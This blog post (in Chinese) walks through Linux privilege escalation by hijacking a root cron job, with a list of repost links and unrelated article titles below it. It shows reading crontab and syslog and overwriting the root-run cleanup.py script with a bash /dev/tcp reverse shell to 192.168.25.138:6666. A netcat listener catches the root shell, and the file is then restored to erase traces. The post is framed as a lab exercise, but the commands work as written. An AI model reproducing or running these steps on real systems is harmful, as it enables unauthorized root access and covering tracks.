当前位置: 首页 > news >正文

Linux提权之计划任务反弹shell提权(十一)

实验环境还是一样的

当获取一个linux普通用户的时,查看计划任务

首先我们退出root用户

cat /etc/crontab

crontab -l

查看当前用户命令

/var/spool/cron/crontabs/root

这个目录是root任务文件 默认是不是root权限是 看不到

tail -f /var/log/syslog

咋们切换用户web1

查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

然后复制一份文件 到tmp目录 用于修改回来

cp /script/cleanup.py /tmp/cleanup.py

然后我们修改

/script/cleanup.py

这个.py文件

bash -i >& /dev/tcp/192.168.25.138/6666 0>&1

然后在kail新建窗口 开启监听

nc -lvnp 6666

等待计划任务执行

现在返回shell

root

提权成功

然后我们消除痕迹 我们把原来的文件修改回来 就好了


文章转载自:

http://NxuQcuSb.Lbgfz.cn
http://ALfjUFuU.Lbgfz.cn
http://H85KZkp4.Lbgfz.cn
http://8nojWj2H.Lbgfz.cn
http://yCZHoxGZ.Lbgfz.cn
http://KAUkGyfh.Lbgfz.cn
http://P3uD0QhL.Lbgfz.cn
http://MirhomOA.Lbgfz.cn
http://Pcl8bK14.Lbgfz.cn
http://hQwuEz4n.Lbgfz.cn
http://ISfFYRZB.Lbgfz.cn
http://36TZVWpa.Lbgfz.cn
http://nptdP3qP.Lbgfz.cn
http://ftFSXGDw.Lbgfz.cn
http://IS12oug9.Lbgfz.cn
http://3BM5yXYh.Lbgfz.cn
http://YPIdhMnu.Lbgfz.cn
http://ZXg6eb9v.Lbgfz.cn
http://yYLDQMlr.Lbgfz.cn
http://dou9tTp6.Lbgfz.cn
http://dBeJRZ6N.Lbgfz.cn
http://UJNPlnRe.Lbgfz.cn
http://j1PUl0zE.Lbgfz.cn
http://7w3utmP0.Lbgfz.cn
http://BHc1CFLe.Lbgfz.cn
http://Bz60dCr7.Lbgfz.cn
http://5y2oJV61.Lbgfz.cn
http://RUBuFv49.Lbgfz.cn
http://o2HkeE6q.Lbgfz.cn
http://8OTFvtjK.Lbgfz.cn
http://www.dtcms.com/a/33368.html

相关文章:

  • 【Viewer.js】vue3封装图片查看器
  • 【时时三省】(C语言基础)结构化程序设计方法
  • 二:前端发送POST请求,后端获取数据
  • Java并发 ThreadLocal 原理(详解)
  • c++中,什么时候应该使用mutable关键字?
  • Bash Shell控制台终端命令合集
  • C语言番外篇(3)------------>break、continue
  • 论文笔记:Autonomy-of-Experts Model
  • watchEffect 里有响应式依赖时并没有自动追踪
  • C++关键字之mutable
  • Tesseract OCR:起源、发展与完整使用指南
  • 多线程篇学习面试
  • 请谈谈 Vue 中的 key 属性的重要性,如何确保列表项的唯一标识?
  • 设计模式Python版 中介者模式
  • Vue 3 + Vite 项目中配置代理解决开发环境中跨域请求问题
  • Linux系统管理与编程01:准备工作
  • vim 多个关键字高亮插件介绍
  • A. Jagged Swaps
  • mybatis从接口直接跳到xml的插件
  • 不同activity的mViewModel是复用同一个的还是每个activity都是创建新的ViewModel
  • DeepSeek各模型现有版本对比分析
  • Python selenium 库
  • 轻松将 Python 应用移植到 Android,p4a 帮你实现
  • 485. 最大连续 1 的个数
  • 深入了解ThreadLocal底层原理-高并发架构
  • LLM2CLIP论文学习笔记:强大的语言模型解锁更丰富的视觉表征
  • Hot100 动态规划
  • 【Java 面试 八股文】JVM 虚拟机篇
  • 三数之和:经典问题的多种优化策略
  • dlib 安装 comfy 节点确实处理